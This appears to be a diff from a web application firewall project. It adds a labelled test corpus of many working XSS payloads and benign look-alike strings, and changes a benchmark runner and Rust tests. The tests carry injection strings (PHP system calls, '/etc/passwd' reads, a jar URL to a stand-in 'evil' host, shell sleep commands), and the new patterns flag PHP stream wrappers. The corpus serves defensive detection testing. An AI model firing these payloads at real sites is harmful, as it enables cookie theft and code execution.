+  "payload": "<div id=\"53\"><xml id=\"xss\" src=\"test.htc\"></xml>"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "<a href=\"\\xE1\\xA0\\x8Ejavascript:javascript:alert(0260)\" id=\"fuzzelement1\">test</a>"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "ABC<div style=\"x:\\xE2\\x80\\x83expression(javascript:alert(1)\">DEF"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "&#x003c;"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "&#X0003C"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "<style></style\\x20<img src=\"about:blank\" onerror=javascript:alert(1779)//></style>"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "<iframe/src=\"data:text/html,<svg &#111;&#110;load=alert(1)>\">"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "<div id=\"43\"><?xml version=\"1.0\" standalone=\"no\"?>"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "`\"'><img src=xxx:x onerror\\x0A=javascript:alert(1)>"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "<marquee onstart='javascript:alert&#x28;1&#x29;'>^__^"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "<div id=\"127\"><svg xmlns=\"http://www.w3.org/2000/svg\" id=\"x\">"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "payload=<a href=abc style=\"width:101%;height:100%;position:absolute;font-size:1000px;\">xss<base href=\"//evil/</a>"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "<script>javascript:alert(9764)</script\\x0B"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "&#34;&#62;<svg><style>{-o-link-source&colon;'<body/onload=confirm(1)>'"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "<XML ID=I><X><C><![CDATA[<IMG SRC=\"javas]]><![CDATA[cript:alert('XSS');\">]]>"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "<script src=javascript:alert(1)>"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "<object data=%22data:text/html;base64,PHNjcmlwdD4gdmFyIHhociA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpOyB4aHIub3BlbignR0VUJywgJ2h0dHA6Ly94c3NtZS5odG1sNXNlYy5vcmcveHNzbWUyJywgdHJ1ZSk7IHhoci5vbmxvYWQgPSBmdW5jdGlvbigpIHsgYWxlcnQoeGhyLnJlc3BvbnNlVGV4dC5tYXRjaCgvY29va2llID0gJyguKj8pJy8pWzFdKSB9OyB4aHIuc2VuZCgpOyA8L3NjcmlwdD4=%22>"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "`\"'><img src=xxx:x \\x22onerror=javascript:alert(1)>"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "<html:style /><x xlink:href=\"javascript:alert(68)\" xlink:type=\"simple\">XXX</x>"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "<object onafterscriptexecute=confirm(0)>"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "<frameset onFocus frameset onFocus=\"javascript:javascript:alert(8187)\"></frameset onFocus>"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "<XSS STYLE=\"behavior: url(%(htc)s);\">"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "<script\\x09>javascript:alert(1)</script>"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "<a href=\"\\x01javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "ABC<div style=\"x:\\xE2\\x80\\x80expression(javascript:alert(3542)\">DEF"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "<a href=\"\\x05javascript:javascript:alert(8115)\" id=\"fuzzelement1\">test</a>"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "\"`'><script>\\xE2\\x80\\x86javascript:alert(1)</script>"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "<BGSOUND SRC=\"javascript:alert(5993);\">"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "a=document%2F%2Afoo%2A%2F.%2F%2Abar%2A%2Fcookie"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "<body onpagehide body onpagehide=\"javascript:javascript:alert(1)\"></body onpagehide>"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "<div id=\"128\"><svg><style>&lt;img/src=x onerror=alert(128)// </b>//[\"'`-->]]>]</div>"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "bar%3Cf%20o%20r%20m"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "&#X00003C;"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "\"`'><script>\\xE2\\x80\\x80javascript:alert(1)</script>"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "<div id=d><x xmlns='\"><iframe onload=alert(2)//'></div>"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "<img/id=\"alert&lpar;&#x27;XSS&#x27;&#x29;\\\"/alt=\\\"/\\\"src=\\\"/\\\"onerror=eval(id&#x29;>"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "<embed code=javascript:javascript:alert(5860);></embed>"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "</div>"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "<script>alert(1)<!--INJECTX"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "ABC<div style=\"x:\\x0Dexpression(javascript:alert(4501)\">DEF"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "<img src ?itworksonchrome?\\/onerror = alert(1)???"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "<a href=\"javas\\x0Dcript:javascript:alert(5613)\" id=\"fuzzelement1\">test</a>"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "\"/><img/onerror=\\x0Bjavascript:alert(1)\\x0Bsrc=xxx:x />"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "<IMG SRC=JaVaScRiPt:alert(9924)>"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "ABC<div style=\"x:\\xE2\\x80\\x86expression(javascript:alert(1)\">DEF"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "<img \\x12src=x onerror=\"javascript:alert(1)\">"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "<a href=\"javas\\x05cript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "<div id=d><x xmlns=\"><iframe onload=alert(97)\"></div>"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "\"`'><script>\\xEF\\xBB\\xBFjavascript:alert(1)</script>"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "a=%28document%2F%2Afoo%2A%2F%29%5B%22cookie%22%5D"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "\"`'><script>\\xE3\\x80\\x80javascript:alert(4334)</script>"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "</html>//[\"'`-->]]>]</div>"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "<TABLE BACKGROUND=\"javascript:alert('XSS')\">"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "<body onblur body onblur=\"javascript:javascript:alert(1)\"></body onblur>"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "<img src=x\\x13onerror=\"javascript:alert(8310)\">"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "X<x style=`behavior:url(#default#time2)` onbegin=`javascript:alert(1)` >"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "<object onerror=javascript:javascript:alert(1)>"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "<x%2Fonxxx=1"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "%3c%3fimport%20implementation%20%3d"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "*{color:red}</style>//[\"'`-->]]>]</div>"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "<script\\x0Atype=\"text/javascript\">javascript:alert(1667);</script>"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "<BODY BACKGROUND=\"javascript:alert('XSS')\">"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "jAvascript:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);//"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "<a href=\"javas\\x07cript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "<a href=\"\\x16javascript:javascript:alert(8897)\" id=\"fuzzelement1\">test</a>"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "<! foo=\"[[[x]]\"><x foo=\"]foo><script>alert(91)</script>\">"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "<img src=x onerror=\\x32\"javascript:alert(0825)\">"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "<IFRAME SRC=# onmouseover=\"alert(4431)\"></IFRAME>"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "<x%0Aonxxx=1"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "\"><script+src=\"https://wb.amap.com/channel.php?callback=alert(1337)\"></script>"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "<video poster=javascript:javascript:alert(1)//"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "\"`'><script>\\xE2\\x81\\x9Fjavascript:alert(1)</script>"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "<b <script>alert(1)</script>0"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "</head>"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "<img src ?itworksonchrome?\\/onerror = alert(0008)"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "<! foo=\"[[[Inception]]\"><x foo=\"]foo><script>javascript:alert(1)</script>\">"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "<textarea type=\"text\" cols=\"50\" rows=\"10\"></textarea>//[\"'`-->]]>]</div>"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "`\"'><img src=xxx:x \\x0Bonerror=javascript:alert(5601)>"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "<BGSOUND SRC=\"javascript:javascript:alert(2563);\">"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "\"`'><script>\\x3Bjavascript:alert(0882)</script>"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "`\"'><img src=xxx:x \\x2Fonerror=javascript:alert(2873)>"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "<script itworksinallbrowsers>/*<script* */alert(3068)</script"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "<label>type a,b,c,d - watch the network tab/traffic (JS is off, latest NoScript)</label>"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "<a href=\"\\xE1\\xA0\\x8Ejavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "<x contenteditable onkeyup=alert(1)>press any key!"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "<audio src onloadstart=alert(1)>"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "<form><button formaction=\"javascript:javascript:alert(9903)\">X"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "<html onMouseMove html onMouseMove=\"javascript:javascript:alert(1)\"></html onMouseMove>"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "<x xmlns=\"http://www.w3.org/2001/xml-events\" event=\"load\" observer=\"foo\" handler=\"data:image/svg+xml,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%0A%3Chandler%20xml%3Aid%3D%22bar%22%20type%3D%22application%2Fecmascript%22%3E alert(104) %3C%2Fhandler%3E%0A%3C%2Fsvg%3E%0A#bar\"/>"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "<a href=\"\\xE2\\x80\\x80javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "SELECT a plan that fits your team"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "I'll alert you the moment it's ready"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "the union of designers and engineers"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "price > 100 AND rating < 5 stars"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "1=1 is a tautology we cover in math class"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "O'Brien"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "D'Angelo & Sons, Inc."
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "user@example.com"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "https://maps.example.com/?q=cafe+near+me"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "function() { return total * 1.2; }"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "<b>Bold</b> and <i>italic</i> text"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "path/to/my/report.2024.json"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "drop me an email when you can"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "a great script for the school play"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "SELECT-O-MATIC vacuum, model X"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "comment count: 42; likes: 1337"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "2 * 7 = 14 and 7 * 7 = 49"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "order by date, then by name please"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "the cat sat on the mat"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "{\"name\":\"Acme\",\"qty\":3,\"price\":9.99}"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "search: best practices for REST APIs"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "passwd reset link requested"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NSJ9.abc"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "git commit -m 'fix the parser'"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "let x = a && b || c;"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "the script kiddie movie was fun"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "100% organic & fair-trade"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "regex: ^[a-z]+$ matches lowercase"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "a < b and b > c"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "<!-- this is an HTML comment -->"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "SELECT * is an anti-pattern, avoid it"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "alert: low disk space on /var"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "the password must be 12+ chars"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "Q1 revenue grew 7*7 percent (kidding)"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "DROP-DOWN menu styling"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "use UNION types in TypeScript"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "../docs/readme.md relative link"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "cmd+shift+p opens the palette"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "{{ user.name }} in a Jinja template doc"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "$HOME/.config/app.toml"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "exec summary attached"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "id: 12345, name: Acme Corp"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "onclick handlers should be CSP-safe"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "the order by which we ship matters"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "select your seat from the map"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "I command the room when I present"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "traverse the directory tree carefully"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "inject some humor into the deck"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "a template for the quarterly review"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "evaluate the proposal by Friday"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "concatenate the two reports"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "https://en.wikipedia.org/wiki/SQL_injection"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "the article explains XSS for beginners"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "our LDAP directory lists 400 staff"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "the GraphQL schema has 30 types"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "deserialize the JSON into a struct"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "char limit is 280 like old Twitter"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "true && ready to ship"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "x = y == z ? 1 : 0"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "the union meeting is at 5pm"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "drop the puck — hockey starts!"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "ping me on Slack"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "curl up with a good book"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "the cat command prints files"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "we use bash for our scripts"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "ls of attendees attached"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "echo chamber of opinions"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "rm stands for 'remove' in Unix class"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "a 1' golf putt"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "she said \"hello\" and waved"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "co-op & condo listings"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "name: O'Reilly Media"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "the file is at C:/Users/me/doc.txt"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "rate: 5 > 4 > 3 stars"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "100 OR more attendees expected"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "AND/OR logic gates lecture"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "the SELECT committee meets Tuesday"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "<h1>Welcome</h1> to our site"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "<a href=\"https://example.com\">link</a>"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "markdown **bold** and _italic_"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "the proto file defines the API"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "constructor of the class takes 2 args"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "an object with id and name fields"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "system design interview prep"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "process the queue in order"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "runtime is O(n log n)"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "the template literal `${name}` in JS docs"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "use && to chain commands in the tutorial"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "café, naïve, résumé — accented words"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "emoji test: rocket and sparkles"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "Tokyo, Japan — 35.6N"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "two plus two equals four"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "the quick brown fox jumps"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "lorem ipsum dolor sit amet"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "version 1.2.3 released today"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "ticket #4567 is resolved"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "discount code SAVE20 applied"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "meeting notes: action items below"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "the API returns 200 on success"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "HTTP 404 means not found"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "JSON over HTTPS is standard"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "OAuth2 bearer token in header"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "rate limit: 100 req/min"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "the cache TTL is 3600 seconds"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "gzip compression enabled"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "CDN edge in eu-west-1"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "select all that apply"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "union square is in NYC"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "the drop ceiling needs repair"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "command line interface basics"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "path of least resistance"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "template ready for review"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "we evaluate vendors quarterly"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "the script for episode 3"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "alert fatigue is real"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "inject confidence into the team"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "traverse from A to B"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "a benign query: products?sort=price"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "search?q=rust+web+framework"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "filter by category=books"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "page=2&limit=20"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "user-agent: Mozilla/5.0 normal browser"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "referer from our own domain"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "accept: application/json"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "the form has name and email fields"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "upload a profile picture"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "comment posted successfully"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "shopping cart has 3 items"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "checkout total is $49.99"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "shipping to 90210"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "the README explains setup"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "see CONTRIBUTING.md for guidelines"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "license is Apache-2.0"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "stack trace truncated for brevity"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "log level set to INFO"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "debug mode is off in prod"
+ }
+]

--- a/benchmarks/waf-corpus/run.py
+++ b/benchmarks/waf-corpus/run.py
@@ -16,7 +16,10 @@ from pathlib import Path
 BASE = sys.argv[1] if len(sys.argv) > 1 else "https://127.0.0.1:4431"
 LABEL = sys.argv[2] if len(sys.argv) > 2 else "zion"
 URL = BASE + "/api/v1/data"
-CORPUS = json.loads((Path(__file__).parent / "corpus.json").read_text())
+# Corpus file: $WAF_CORPUS (default v1). v2 is the larger sourced set.
+import os
+CORPUS_FILE = os.environ.get("WAF_CORPUS", "corpus.json")
+CORPUS = json.loads((Path(__file__).parent / CORPUS_FILE).read_text())
 CTX = ssl.create_default_context(); CTX.check_hostname = False; CTX.verify_mode = ssl.CERT_NONE
 
 

--- a/src/waf.rs
+++ b/src/waf.rs
@@ -1647,17 +1647,17 @@ mod tests {
         // real-world misses added to the aggressive set. One assertion per family.
         let p = aggressive_profile();
         for body in [
-            &br#"{"x":"<?php system('id'); ?>"}"#[..],   // php tag + func
-            &br#"{"x":"shell_exec('ls')"}"#[..],         // php dangerous func
-            &br#"{"x":"java.lang.Process"}"#[..],        // java gadget class
-            &br#"{"x":"java.io.PrintStream"}"#[..],      // java io class
-            &br#"{"x":"file:///etc/passwd"}"#[..],       // ssrf/lfi scheme
+            &br#"{"x":"<?php system('id'); ?>"}"#[..], // php tag + func
+            &br#"{"x":"shell_exec('ls')"}"#[..],       // php dangerous func
+            &br#"{"x":"java.lang.Process"}"#[..],      // java gadget class
+            &br#"{"x":"java.io.PrintStream"}"#[..],    // java io class
+            &br#"{"x":"file:///etc/passwd"}"#[..],     // ssrf/lfi scheme
             &br#"{"x":"jar:http://evil.co/b.zip!a"}"#[..], // ssrf jar scheme
-            &br#"{"x":"& net view"}"#[..],               // windows cmdi
-            &br#"{"x":"| sleep 15"}"#[..],               // metachar sleep
-            &br#"{"name__startswith":"a"}"#[..],         // django/orm lookup injection
+            &br#"{"x":"& net view"}"#[..],             // windows cmdi
+            &br#"{"x":"| sleep 15"}"#[..],             // metachar sleep
+            &br#"{"name__startswith":"a"}"#[..],       // django/orm lookup injection
             &br#"{"x":"compress.bzip2://file.bz2"}"#[..], // php stream wrapper
-            &br#"{"x":"@{[ system 'id' ]}"}"#[..],       // perl ssti
+            &br#"{"x":"@{[ system 'id' ]}"}"#[..],     // perl ssti
         ] {
             assert_eq!(
                 validate_request("POST", Some("application/json"), body, &p),

--- a/src/waf.rs
+++ b/src/waf.rs
@@ -458,6 +458,47 @@ const AGGRESSIVE_EXTRA_PATTERNS: &[&str] = &[
     "\") or (\"",
     "') or ('",
     "'--",
+    // ── corpus-v2 round: high-frequency real-world misses (FP-checked vs the
+    //    136-payload benign set; all aggressive-tier). ──
+    // PHP stream wrappers (RCE/LFI vectors)
+    "expect://",
+    "data://",
